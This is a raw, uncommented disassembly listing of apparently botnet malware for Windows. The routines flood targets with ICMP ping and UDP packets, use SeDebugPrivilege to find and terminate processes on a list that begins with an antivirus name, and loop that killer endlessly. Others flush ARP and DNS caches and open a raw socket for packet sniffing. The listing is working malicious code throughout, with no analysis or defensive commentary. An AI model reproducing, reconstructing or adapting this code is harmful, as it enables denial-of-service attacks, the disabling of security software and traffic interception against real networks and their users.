lea ecx, [ebp+var_718]
push ecx
lea ecx, [ebp+var_318]
push ecx
push eax
call sub_40AC44
pop ecx
mov esi, offset dword_44BA54
push eax
push offset aNetSServerSMes ; "[NET]: %s <Server: %S> <Message: %S>"
push esi
call sub_418D70
add esp, 14h
loc_40AE31: ; CODE XREF: sub_40AD78+8E�j
mov eax, esi
pop esi
leave
retn
sub_40AD78 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 20h
cmp dword ptr [ebp+8], 0
push esi
jz loc_40AECB
push offset dword_44C2D0
push dword ptr [ebp+8]
call sub_419360
pop ecx
test eax, eax
pop ecx
jz short loc_40AECB
push 20h
lea eax, [ebp-20h]
push dword ptr [ebp+8]
push eax
call sub_4191A0
lea eax, [ebp-20h]
push offset a__0 ; "."
push eax
call sub_419890
add esp, 14h
test eax, eax
jz short loc_40AECB
push eax
call sub_4195F0
mov dword ptr [esp], offset a__1 ; "."
push 0
mov esi, eax
call sub_419890
pop ecx
test eax, eax
pop ecx
jz short loc_40AECB
push eax
call sub_4195F0
cmp esi, 0Ah
pop ecx
jz short loc_40AEC6
cmp esi, 0ACh
jnz short loc_40AEB7
cmp eax, 0Fh
jle short loc_40AECB
cmp eax, 20h
jl short loc_40AEC6
loc_40AEB7: ; CODE XREF: .text:0040AEAB�j
cmp esi, 0C0h
jnz short loc_40AECB
cmp eax, 0A8h
jnz short loc_40AECB
loc_40AEC6: ; CODE XREF: .text:0040AEA3�j
; .text:0040AEB5�j
push 1
pop eax
jmp short loc_40AECD
; ---------------------------------------------------------------------------
loc_40AECB: ; CODE XREF: .text:0040AE41�j
; .text:0040AE58�j ...
xor eax, eax
loc_40AECD: ; CODE XREF: .text:0040AEC9�j
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
sub_40AED0 proc near ; CODE XREF: sub_405026+7�p
; sub_4064A6+83�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_44B700 ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short locret_40AEF8
push [esp+arg_0]
call dword_44B744 ; gethostbyname
test eax, eax
jnz short loc_40AEF1
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_40AEF1: ; CODE XREF: sub_40AED0+1B�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
locret_40AEF8: ; CODE XREF: sub_40AED0+D�j
retn
sub_40AED0 endp
; =============== S U B R O U T I N E =======================================
sub_40AEF9 proc near ; CODE XREF: sub_40C22A+D6�p
mov ecx, dword_44B5E8
xor eax, eax
test ecx, ecx
jz short locret_40AF07
call ecx ; DnsFlushResolverCache
locret_40AF07: ; CODE XREF: sub_40AEF9+A�j
retn
sub_40AEF9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AF08 proc near ; CODE XREF: sub_40C50A:loc_411BF7�p
var_88 = byte ptr -88h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 88h
push ebx
push esi
push edi
push 1
pop ebx
lea eax, [ebp+var_8]
xor edi, edi
push ebx
push eax
push edi
xor esi, esi
mov [ebp+var_8], edi
mov [ebp+var_4], ebx
call dword_44B73C ; GetIpNetTable
mov ecx, eax
sub ecx, edi
jz loc_40AFD4
sub ecx, 32h
jz loc_40AFCD
sub ecx, 48h
jz short loc_40AF68
sub ecx, 6Eh
jz short loc_40AF61
push eax
push offset aFlushdnsErrorG ; "[FLUSHDNS]: Error getting ARP cache: <%"...
loc_40AF50: ; CODE XREF: sub_40AF08+91�j
lea eax, [ebp+var_88]
push eax
call sub_418D70
add esp, 0Ch
jmp short loc_40AFAE
; ---------------------------------------------------------------------------
loc_40AF61: ; CODE XREF: sub_40AF08+40�j
push offset aFlushdnsArpCac ; "[FLUSHDNS]: ARP cache is empty."
jmp short loc_40AFA0
; ---------------------------------------------------------------------------
loc_40AF68: ; CODE XREF: sub_40AF08+3B�j
push [ebp+var_8]
call sub_416A10
push [ebp+var_8]
mov esi, eax
push edi
push esi
call sub_4189A0
add esp, 10h
cmp esi, edi
jz short loc_40AF9B
lea eax, [ebp+var_8]
push ebx
push eax
push esi
call dword_44B73C ; GetIpNetTable
cmp eax, edi
jz short loc_40AFD4
push eax
push offset aFlushdnsErro_0 ; "[FLUSHDNS]: Error getting ARP cache: <%"...
jmp short loc_40AF50
; ---------------------------------------------------------------------------
loc_40AF9B: ; CODE XREF: sub_40AF08+79�j
push offset aFlushdnsUnable ; "[FLUSHDNS]: Unable to allocation ARP ca"...
loc_40AFA0: ; CODE XREF: sub_40AF08+5E�j
; sub_40AF08+CA�j
lea eax, [ebp+var_88]
push eax
call sub_418D70
pop ecx
pop ecx
loc_40AFAE: ; CODE XREF: sub_40AF08+57�j
lea eax, [ebp+var_88]
mov [ebp+var_4], edi
push eax
call sub_4035E1
pop ecx
loc_40AFBE: ; CODE XREF: sub_40AF08+CE�j
; sub_40AF08+E2�j
push esi
call sub_417480
mov eax, [ebp+var_4]
pop ecx
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40AFCD: ; CODE XREF: sub_40AF08+32�j
push offset aFlushdnsNotSup ; "[FLUSHDNS]: Not supported by this syste"...
jmp short loc_40AFA0
; ---------------------------------------------------------------------------
loc_40AFD4: ; CODE XREF: sub_40AF08+29�j
; sub_40AF08+89�j
cmp [esi], edi
jbe short loc_40AFBE
lea ebx, [esi+4]
loc_40AFDB: ; CODE XREF: sub_40AF08+E0�j
push ebx
call dword_44B738 ; DeleteIpNetEntry
inc edi
add ebx, 18h
cmp edi, [esi]
jb short loc_40AFDB
jmp short loc_40AFBE
sub_40AF08 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AFEC proc near ; CODE XREF: sub_40119E+1F�p
; .text:00401810�p ...
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_F = byte ptr -0Fh
var_E = byte ptr -0Eh
var_D = byte ptr -0Dh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push esi
push 10h
pop eax
mov [ebp+var_4], eax
push eax
lea eax, [ebp+var_14]
push 0
push eax
call sub_4189A0
add esp, 0Ch
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_14]
push eax
push [ebp+arg_0]
call dword_44B664 ; getsockname
movzx eax, [ebp+var_D]
push eax
mov esi, offset dword_44C2BC
movzx eax, [ebp+var_E]
push eax
movzx eax, [ebp+var_F]
push eax
movzx eax, [ebp+var_10]
push eax
push offset aD_D_D_D_0 ; "%d.%d.%d.%d"
push esi
call sub_418D70
add esp, 18h
mov eax, esi
pop esi
leave
retn
sub_40AFEC endp
; =============== S U B R O U T I N E =======================================
sub_40B045 proc near ; CODE XREF: .text:00402F56�p
; sub_404CEF+24C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_4]
xor eax, eax
cmp esi, 1
jle short loc_40B06E
mov ecx, esi
push edi
shr ecx, 1
mov edx, ecx
neg edx
lea esi, [esi+edx*2]
mov edx, [esp+8+arg_0]
loc_40B061: ; CODE XREF: sub_40B045+24�j
movzx edi, word ptr [edx]
add eax, edi
inc edx
inc edx
dec ecx
jnz short loc_40B061
pop edi
jmp short loc_40B072
; ---------------------------------------------------------------------------
loc_40B06E: ; CODE XREF: sub_40B045+A�j
mov edx, [esp+4+arg_0]
loc_40B072: ; CODE XREF: sub_40B045+27�j
test esi, esi
pop esi
jz short loc_40B07C
movzx ecx, byte ptr [edx]
add eax, ecx
loc_40B07C: ; CODE XREF: sub_40B045+30�j
mov ecx, eax
and eax, 0FFFFh
shr ecx, 10h
add ecx, eax
mov eax, ecx
shr eax, 10h
add eax, ecx
not eax
retn
sub_40B045 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+0Ch]
mov edx, [ebp+8]
push esi
xor esi, esi
cmp eax, 1
mov [ebp-4], esi
jle short loc_40B0BF
mov ecx, eax
push edi
shr ecx, 1
lea edi, [ecx+ecx]
sub eax, edi
loc_40B0B1: ; CODE XREF: .text:0040B0B9�j
movzx edi, word ptr [edx]
add esi, edi
inc edx
inc edx
dec ecx
jnz short loc_40B0B1
pop edi
cmp eax, 1
loc_40B0BF: ; CODE XREF: .text:0040B0A5�j
jnz short loc_40B0CC
mov al, [edx]
mov [ebp-4], al
movzx eax, word ptr [ebp-4]
add esi, eax
loc_40B0CC: ; CODE XREF: .text:loc_40B0BF�j
mov ecx, esi
and esi, 0FFFFh
sar ecx, 10h
add ecx, esi
pop esi
mov eax, ecx
sar eax, 10h
add eax, ecx
not eax
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B0E5 proc near ; DATA XREF: sub_40C50A+2E6A�o
var_10320 = byte ptr -10320h
var_344 = byte ptr -344h
var_144 = dword ptr -144h
var_140 = byte ptr -140h
var_C0 = byte ptr -0C0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = byte ptr -20h
var_18 = dword ptr -18h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10320h
call sub_418D40
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 49h
mov esi, eax
pop ecx
lea edi, [ebp+var_144]
rep movsd
push 1
pop edi
mov [eax+120h], edi
call dword_44B64C ; IcmpCreateFile
mov [ebp+arg_0], eax
lea eax, [ebp+var_C0]
push eax
call dword_44B700 ; inet_addr
mov esi, eax
xor ebx, ebx
xor eax, eax
cmp esi, 0FFFFFFFFh
jnz short loc_40B140
lea eax, [ebp+var_C0]
push eax
call dword_44B744 ; gethostbyname
cmp eax, ebx
jz short loc_40B146
loc_40B140: ; CODE XREF: sub_40B0E5+48�j
cmp [ebp+arg_0], 0FFFFFFFFh
jnz short loc_40B1A3
loc_40B146: ; CODE XREF: sub_40B0E5+59�j
lea eax, [ebp+var_C0]
push eax
lea eax, [ebp+var_344]
push offset aPingErrorSendi ; "[PING]: Error sending pings to %s."
push eax
call sub_418D70
add esp, 0Ch
cmp [ebp+var_28], ebx
jnz short loc_40B186
push ebx
lea eax, [ebp+var_344]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_140]
push eax
push [ebp+var_144]
call sub_40842D
add esp, 14h
loc_40B186: ; CODE XREF: sub_40B0E5+7F�j
lea eax, [ebp+var_344]
push eax
call sub_4035E1
push [ebp+var_30]
call sub_416507
pop ecx
pop ecx
push edi
call ds:dword_4942FC
loc_40B1A3: ; CODE XREF: sub_40B0E5+5F�j
cmp eax, ebx
jz short loc_40B1B3
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_4], eax
jmp short loc_40B1B6
; ---------------------------------------------------------------------------
loc_40B1B3: ; CODE XREF: sub_40B0E5+C0�j
mov [ebp+var_4], esi
loc_40B1B6: ; CODE XREF: sub_40B0E5+CC�j
push 1Ch
lea eax, [ebp+var_20]
push ebx
push eax
call sub_4189A0
or [ebp+var_18], 0FFFFFFFFh
mov eax, 0FFDCh
add esp, 0Ch
cmp [ebp+var_3C], eax
jle short loc_40B1D6
mov [ebp+var_3C], eax
loc_40B1D6: ; CODE XREF: sub_40B0E5+EC�j
cmp [ebp+var_38], edi
jge short loc_40B1DE
mov [ebp+var_38], edi
loc_40B1DE: ; CODE XREF: sub_40B0E5+F4�j
xor esi, esi
cmp [ebp+var_40], ebx
jle short loc_40B20B
loc_40B1E5: ; CODE XREF: sub_40B0E5+124�j
push [ebp+var_38]
lea eax, [ebp+var_20]
push 1Ch
push eax
push ebx
lea eax, [ebp+var_10320]
push [ebp+var_3C]
push eax
push [ebp+var_4]
push [ebp+arg_0]
call dword_44B5E4 ; IcmpSendEcho
inc esi
cmp esi, [ebp+var_40]
jl short loc_40B1E5
loc_40B20B: ; CODE XREF: sub_40B0E5+FE�j
push [ebp+arg_0]
call dword_44B778 ; IcmpCloseHandle
lea eax, [ebp+var_C0]
push eax
lea eax, [ebp+var_344]
push offset aPingFinishedSe ; "[PING]: Finished sending pings to %s."
push eax
call sub_418D70
add esp, 0Ch
cmp [ebp+var_28], ebx
jnz short loc_40B254
push ebx
lea eax, [ebp+var_344]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_140]
push eax
push [ebp+var_144]
call sub_40842D
add esp, 14h
loc_40B254: ; CODE XREF: sub_40B0E5+14D�j
lea eax, [ebp+var_344]
push eax
call sub_4035E1
push [ebp+var_30]
call sub_416507
pop ecx
pop ecx
push ebx
call ds:dword_4942FC
sub_40B0E5 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B271 proc near ; DATA XREF: sub_40C50A+2FB1�o
var_10312 = byte ptr -10312h
var_10310 = byte ptr -10310h
var_334 = byte ptr -334h
var_134 = dword ptr -134h
var_130 = byte ptr -130h
var_B0 = byte ptr -0B0h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 10310h
call sub_418D40
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 49h
mov esi, eax
pop ecx
lea edi, [ebp+var_134]
rep movsd
push 1
pop esi
mov [eax+120h], esi
call ds:dword_494308
push eax
call sub_418FF0
pop ecx
push 11h
push 2
push 2
call dword_44B740 ; socket
mov ebx, eax
xor edi, edi
push 10h
lea eax, [ebp+var_10]
push edi
push eax
call sub_4189A0
add esp, 0Ch
lea eax, [ebp+var_B0]
mov [ebp+var_10], 2
push eax
call dword_44B700 ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jnz short loc_40B356
lea eax, [ebp+var_B0]
push eax
call dword_44B744 ; gethostbyname
cmp eax, edi
jnz short loc_40B34F
lea eax, [ebp+var_B0]
push eax
lea eax, [ebp+var_334]
push offset aUdpErrorSendin ; "[UDP]: Error sending pings to %s."
push eax
call sub_418D70
add esp, 0Ch
cmp [ebp+var_18], edi
jnz short loc_40B332
push edi
lea eax, [ebp+var_334]
push [ebp+var_1C]
push eax
lea eax, [ebp+var_130]
push eax
push [ebp+var_134]
call sub_40842D
add esp, 14h
loc_40B332: ; CODE XREF: sub_40B271+9F�j
lea eax, [ebp+var_334]
push eax
call sub_4035E1
push [ebp+var_20]
call sub_416507
pop ecx
pop ecx
push esi
call ds:dword_4942FC
loc_40B34F: ; CODE XREF: sub_40B271+7F�j
mov eax, [eax+0Ch]
mov eax, [eax]
jmp short loc_40B359
; ---------------------------------------------------------------------------
loc_40B356: ; CODE XREF: sub_40B271+6E�j
lea eax, [ebp+arg_0]
loc_40B359: ; CODE XREF: sub_40B271+E3�j
mov eax, [eax]
cmp [ebp+var_24], edi
mov [ebp+var_C], eax
jnz short loc_40B374
call sub_419000
cdq
mov ecx, 0FFDCh
idiv ecx
inc edx
push edx
jmp short loc_40B377
; ---------------------------------------------------------------------------
loc_40B374: ; CODE XREF: sub_40B271+F0�j
push [ebp+var_24]
loc_40B377: ; CODE XREF: sub_40B271+101�j
call dword_44B6C0 ; htons
cmp [ebp+var_24], esi
mov [ebp+var_E], ax
jge short loc_40B389
mov [ebp+var_24], esi
loc_40B389: ; CODE XREF: sub_40B271+113�j
mov eax, 0FFFFh
cmp [ebp+var_24], eax
jle short loc_40B396
mov [ebp+var_24], eax
loc_40B396: ; CODE XREF: sub_40B271+120�j
mov eax, [ebp+var_30]
push 0Ah
cdq
pop ecx
idiv ecx
cmp [ebp+var_28], edi
mov [ebp+var_30], eax
jnz short loc_40B3AA
mov [ebp+var_28], esi
loc_40B3AA: ; CODE XREF: sub_40B271+134�j
xor esi, esi
cmp [ebp+var_2C], edi
jle short loc_40B3CB
loc_40B3B1: ; CODE XREF: sub_40B271+158�j
call sub_419000
cdq
mov ecx, 0FFh
idiv ecx
inc esi
cmp esi, [ebp+var_2C]
mov [ebp+esi-10311h], dl
jl short loc_40B3B1
loc_40B3CB: ; CODE XREF: sub_40B271+13E�j
; sub_40B271+19C�j ...
mov eax, [ebp+var_30]
dec [ebp+var_30]
test eax, eax
jle short loc_40B42A
push 0Bh
pop esi
loc_40B3D8: ; CODE XREF: sub_40B271+197�j
lea eax, [ebp+var_10]
push 10h
push eax
push edi
call sub_419000
push 0Ah
cdq
pop ecx
idiv ecx
mov eax, [ebp+var_2C]
sub eax, edx
push eax
lea eax, [ebp+var_10310]
push eax
push ebx
call dword_44B724 ; sendto
push [ebp+var_28]
call ds:dword_4942D8
dec esi
jnz short loc_40B3D8
cmp [ebp+var_24], edi
jnz short loc_40B3CB
call sub_419000
cdq
mov ecx, 0FFDCh
idiv ecx
inc edx
push edx
call dword_44B6C0 ; htons
mov [ebp+var_E], ax
jmp short loc_40B3CB
; ---------------------------------------------------------------------------
loc_40B42A: ; CODE XREF: sub_40B271+162�j
lea eax, [ebp+var_B0]
push eax
lea eax, [ebp+var_334]
push offset aUdpFinishedSen ; "[UDP]: Finished sending packets to %s."
push eax
call sub_418D70
add esp, 0Ch
cmp [ebp+var_18], edi
jnz short loc_40B46A
push edi
lea eax, [ebp+var_334]
push [ebp+var_1C]
push eax
lea eax, [ebp+var_130]
push eax
push [ebp+var_134]
call sub_40842D
add esp, 14h
loc_40B46A: ; CODE XREF: sub_40B271+1D7�j
lea eax, [ebp+var_334]
push eax
call sub_4035E1
push [ebp+var_20]
call sub_416507
pop ecx
pop ecx
push edi
call ds:dword_4942FC
sub_40B271 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B487 proc near ; CODE XREF: sub_405C86+45�p
; sub_405C86+166�p ...
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
lea eax, [ebp+var_4]
push eax
push 28h
call ds:dword_494290
push eax
call dword_44B6A4 ; OpenProcessToken
test eax, eax
jnz short loc_40B4A6
leave
retn
; ---------------------------------------------------------------------------
loc_40B4A6: ; CODE XREF: sub_40B487+1B�j
lea eax, [ebp+var_10]
push esi
push eax
xor esi, esi
push [ebp+arg_0]
push esi
call dword_44B67C ; LookupPrivilegeValueA
test eax, eax
jz short loc_40B4E4
cmp [ebp+arg_4], esi
mov [ebp+var_14], 1
jz short loc_40B4CD
or [ebp+var_8], 2
jmp short loc_40B4D1
; ---------------------------------------------------------------------------
loc_40B4CD: ; CODE XREF: sub_40B487+3E�j
and [ebp+var_8], 0FFFFFFFDh
loc_40B4D1: ; CODE XREF: sub_40B487+44�j
push esi
push esi
lea eax, [ebp+var_14]
push esi
push eax
push esi
push [ebp+var_4]
call dword_44B72C ; AdjustTokenPrivileges
mov esi, eax
loc_40B4E4: ; CODE XREF: sub_40B487+32�j
push [ebp+var_4]
call ds:dword_4942E0
mov eax, esi
pop esi
leave
retn
sub_40B487 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B4F2 proc near ; CODE XREF: sub_40B735+74�p
; sub_40B84A+A�p ...
var_554 = byte ptr -554h
var_354 = dword ptr -354h
var_350 = byte ptr -350h
var_234 = byte ptr -234h
var_130 = dword ptr -130h
var_12C = byte ptr -12Ch
var_128 = dword ptr -128h
var_10C = byte ptr -10Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 554h
push ebx
push esi
push edi
push 49h
xor ebx, ebx
pop ecx
xor eax, eax
cmp dword_44B6E0, ebx
lea edi, [ebp+var_12C]
mov [ebp+var_130], ebx
rep stosd
mov ecx, 88h
lea edi, [ebp+var_350]
mov [ebp+var_354], ebx
rep stosd
jz loc_40B705
cmp dword_44B6C4, ebx
jz loc_40B705
cmp dword_44B5E0, ebx
jz loc_40B705
push 1
push offset aSedebugprivi_1 ; "SeDebugPrivilege"
call sub_40B487
pop ecx
pop ecx
push ebx
push 0Fh
call dword_44B6E0 ; CreateToolhelp32Snapshot
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_8], edi
jz loc_40B6F8
lea eax, [ebp+var_130]
mov [ebp+var_130], 128h
push eax
push edi
call dword_44B6C4 ; Process32First
mov esi, ds:dword_4942E0
test eax, eax
jz loc_40B6F3
lea eax, [ebp+var_130]
push eax
push edi
call dword_44B5E0 ; Process32Next
test eax, eax
jz loc_40B6F3
mov edi, ds:dword_494370
mov ebx, 1F0FFFh
loc_40B5B6: ; CODE XREF: sub_40B4F2+1F9�j
xor eax, eax
cmp [ebp+arg_10], eax
jz short loc_40B61D
mov [ebp+var_4], offset off_43B340
loc_40B5C4: ; CODE XREF: sub_40B4F2+F3�j
mov eax, [ebp+var_4]
push dword ptr [eax]
lea eax, [ebp+var_10C]
push eax
call ds:dword_4943BC
test eax, eax
jz short loc_40B5EC
add [ebp+var_4], 4
cmp [ebp+var_4], offset aAckwin32_exe ; "ACKWIN32.EXE"
jl short loc_40B5C4
jmp loc_40B6D9
; ---------------------------------------------------------------------------
loc_40B5EC: ; CODE XREF: sub_40B4F2+E6�j
push [ebp+var_128]
push 0
push ebx
call edi
test eax, eax
mov [ebp+var_4], eax
jz loc_40B6D9
push 0
push eax
call ds:dword_4943B8
test eax, eax
jnz loc_40B6D9
loc_40B613: ; CODE XREF: sub_40B4F2+1CD�j
push [ebp+var_4]
call esi
jmp loc_40B6D9
; ---------------------------------------------------------------------------
loc_40B61D: ; CODE XREF: sub_40B4F2+C9�j
cmp [ebp+arg_C], eax
jnz loc_40B6C4
cmp [ebp+arg_4], eax
jz loc_40B6D9
push [ebp+var_128]
push 8
call dword_44B6E0 ; CreateToolhelp32Snapshot
cmp [ebp+arg_14], 0
mov [ebp+var_4], eax
mov [ebp+var_354], 224h
jz short loc_40B684
lea ecx, [ebp+var_354]
push ecx
push eax
call dword_44B58C ; Module32First
push [ebp+var_128]
test eax, eax
jz short loc_40B676
lea eax, [ebp+var_234]
push eax
push offset aSD_0 ; " %s (%d)"
jmp short loc_40B696
; ---------------------------------------------------------------------------
loc_40B676: ; CODE XREF: sub_40B4F2+174�j
lea eax, [ebp+var_10C]
push eax
push offset aSD_1 ; " %s (%d)"
jmp short loc_40B696
; ---------------------------------------------------------------------------
loc_40B684: ; CODE XREF: sub_40B4F2+15C�j
push [ebp+var_128]
lea eax, [ebp+var_10C]
push eax
push offset aSD_2 ; " %s (%d)"
loc_40B696: ; CODE XREF: sub_40B4F2+182�j
; sub_40B4F2+190�j
lea eax, [ebp+var_554]
push eax
call sub_418D70
add esp, 10h
lea eax, [ebp+var_554]
push 1
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40842D
add esp, 14h
jmp loc_40B613
; ---------------------------------------------------------------------------
loc_40B6C4: ; CODE XREF: sub_40B4F2+12E�j
push [ebp+arg_C]
lea eax, [ebp+var_10C]
push eax
call sub_419360
pop ecx
test eax, eax
pop ecx
jz short loc_40B70C
loc_40B6D9: ; CODE XREF: sub_40B4F2+F5�j
; sub_40B4F2+10A�j ...
lea eax, [ebp+var_130]
push eax
push [ebp+var_8]
call dword_44B5E0 ; Process32Next
test eax, eax
jnz loc_40B5B6
xor ebx, ebx
loc_40B6F3: ; CODE XREF: sub_40B4F2+9D�j
; sub_40B4F2+B3�j
push [ebp+var_8]
call esi
loc_40B6F8: ; CODE XREF: sub_40B4F2+77�j
push ebx
push offset aSedebugprivi_2 ; "SeDebugPrivilege"
call sub_40B487
pop ecx
pop ecx
loc_40B705: ; CODE XREF: sub_40B4F2+3A�j
; sub_40B4F2+46�j ...
xor eax, eax
loc_40B707: ; CODE XREF: sub_40B4F2+241�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40B70C: ; CODE XREF: sub_40B4F2+1E5�j
push [ebp+var_128]
push 0
push ebx
call edi
push [ebp+var_8]
mov edi, eax
call esi
push 0
push edi
call ds:dword_4943B8
test eax, eax
jnz short loc_40B730
push edi
call esi
jmp short loc_40B705
; ---------------------------------------------------------------------------
loc_40B730: ; CODE XREF: sub_40B4F2+237�j
push 1
pop eax
jmp short loc_40B707
sub_40B4F2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B735 proc near ; DATA XREF: sub_40C50A+594E�o
var_298 = byte ptr -298h
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 298h
mov eax, [ebp+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+var_98]
push offset aProcListingPro ; "[PROC]: Listing processes:"
rep movsd
mov dword ptr [eax+94h], 1
lea eax, [ebp+var_298]
push eax
call sub_418D70
xor esi, esi
pop ecx
cmp [ebp+var_8], esi
pop ecx
jnz short loc_40B794
push esi
lea eax, [ebp+var_298]
push [ebp+var_C]
push eax
lea eax, [ebp+var_94]
push eax
push [ebp+var_98]
call sub_40842D
add esp, 14h
loc_40B794: ; CODE XREF: sub_40B735+3D�j
push [ebp+var_10]
lea eax, [ebp+var_94]
push esi
push esi
push [ebp+var_C]
push eax
push [ebp+var_98]
call sub_40B4F2
add esp, 18h
test eax, eax
jnz short loc_40B7BC
push offset aProcProcessLis ; "[PROC]: Process list completed."
jmp short loc_40B7C1
; ---------------------------------------------------------------------------
loc_40B7BC: ; CODE XREF: sub_40B735+7E�j
push offset aProcProcessL_0 ; "[PROC]: Process list failed."
loc_40B7C1: ; CODE XREF: sub_40B735+85�j
lea eax, [ebp+var_298]
push eax
call sub_418D70
cmp [ebp+var_8], esi
pop ecx
pop ecx
jnz short loc_40B7F4
push esi
lea eax, [ebp+var_298]
push [ebp+var_C]
push eax
lea eax, [ebp+var_94]
push eax
push [ebp+var_98]
call sub_40842D
add esp, 14h
loc_40B7F4: ; CODE XREF: sub_40B735+9D�j
lea eax, [ebp+var_298]
push eax
call sub_4035E1
push [ebp+var_14]
call sub_416507
pop ecx
pop ecx
push esi
call ds:dword_4942FC
pop edi
pop esi
sub_40B735 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40B813 proc near ; CODE XREF: sub_40C50A+4B12�p
; sub_416326+53�p
arg_0 = dword ptr 4
push esi
push edi
push 1
pop edi
push [esp+8+arg_0]
push 0
push 1F0FFFh
call ds:dword_494370
mov esi, eax
test esi, esi
jz short loc_40B845
push 0
push esi
call ds:dword_4943B8
test eax, eax
jnz short loc_40B845
push esi
xor edi, edi
call ds:dword_4942E0
loc_40B845: ; CODE XREF: sub_40B813+1A�j
; sub_40B813+27�j
mov eax, edi
pop edi
pop esi
retn
sub_40B813 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_40B84A proc near ; DATA XREF: sub_40BBCB+3CA�o
push esi
xor esi, esi
loc_40B84D: ; CODE XREF: sub_40B84A+1E�j
push 1
push esi
push esi
push esi
push esi
push esi
call sub_40B4F2
add esp, 18h
push dword_43B33C
call ds:dword_4942D8
jmp short loc_40B84D
sub_40B84A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40B86A proc near ; DATA XREF: sub_40C50A+1C99�o
var_102B4 = byte ptr -102B4h
var_102AB = byte ptr -102ABh
var_102A8 = dword ptr -102A8h
var_102A0 = dword ptr -102A0h
var_10293 = byte ptr -10293h
var_1028C = byte ptr -1028Ch
var_2B4 = byte ptr -2B4h
var_B4 = dword ptr -0B4h
var_B0 = byte ptr -0B0h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = byte ptr -20h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 102B4h
call sub_418D40
mov edx, [ebp+arg_0]
push esi
push edi
push 1
pop eax
mov esi, edx
push 25h
lea edi, [ebp+var_B4]
pop ecx
mov [ebp+var_8], eax
rep movsd
mov [edx+90h], eax
xor esi, esi
push 10h
lea eax, [ebp+var_1C]
push esi
push eax
call sub_4189A0
add esp, 0Ch
mov [ebp+var_1C], 2
push esi
call dword_44B6C0 ; htons
push [ebp+var_B4]
mov [ebp+var_1A], ax
call sub_40AFEC
pop ecx
push eax
call dword_44B700 ; inet_addr
push esi
push 3
push 2
mov [ebp+var_18], eax
call dword_44B740 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_4], edi
jnz short loc_40B93F
call dword_44B654 ; WSAGetLastError
push eax
lea eax, [ebp+var_2B4]
push offset aPsniffErrorSoc ; "[PSNIFF]: Error: socket() failed, retur"...
push eax
call sub_418D70
add esp, 0Ch
cmp [ebp+var_28], esi
jnz short loc_40B922
push esi
lea eax, [ebp+var_2B4]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_B0]
push eax
push [ebp+var_B4]
call sub_40842D
add esp, 14h
loc_40B922: ; CODE XREF: sub_40B86A+96�j
lea eax, [ebp+var_2B4]
push eax
call sub_4035E1
push [ebp+var_30]
call sub_416507
pop ecx
pop ecx
push esi
call ds:dword_4942FC
